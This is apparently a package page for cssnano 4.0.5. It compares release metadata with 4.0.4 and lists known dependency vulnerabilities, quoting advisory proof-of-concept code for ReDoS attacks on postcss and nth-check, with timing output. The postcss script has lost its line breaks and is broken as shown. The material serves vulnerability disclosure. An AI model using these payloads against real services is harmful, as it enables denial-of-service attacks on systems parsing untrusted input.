Cssnano, a modular CSS minifier built upon the PostCSS ecosystem, released version 4.0.5 on July 30, 2018, following closely after version 4.0.4 released on July 25, 2018. Both versions share the same core dependencies including Postcss, Cosmiconfig, Is-resolvable and Cssnano-preset-default, and development dependencies like Ncp, Webpack, Babel, Array-to-sentence, Postcss-font-magician, Cssnano-preset-advanced and Webpack-bundle-size-analyzer, crucial for development and testing. Developers familiar with the PostCSS environment will find cssnano easily integrable into existing workflows.
The key difference is in the distribution details. Version 4.0.5 has a fileCount of 6 and an unpackedSize of 26386 bytes, while version 4.0.4 has a fileCount of 8 and unpackedSize of 26199 bytes, suggesting some files were consolidated or removed in the newer version potentially optimizing the package structure. The repository URL in version 4.0.5 includes "git+" prefix which is missing from version 4.0.4 data. This minor adjustment along with a slightly altered package size could indicate internal improvements or bug fixes. Developers upgrading should consider testing their configurations to ensure seamless transition, although the core functionality remains consistent. Cssnano helps optimize CSS, resulting in smaller file sizes and improved website loading times, making it a valuable asset for web performance.
All the vulnerabilities related to the version 4.0.5 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms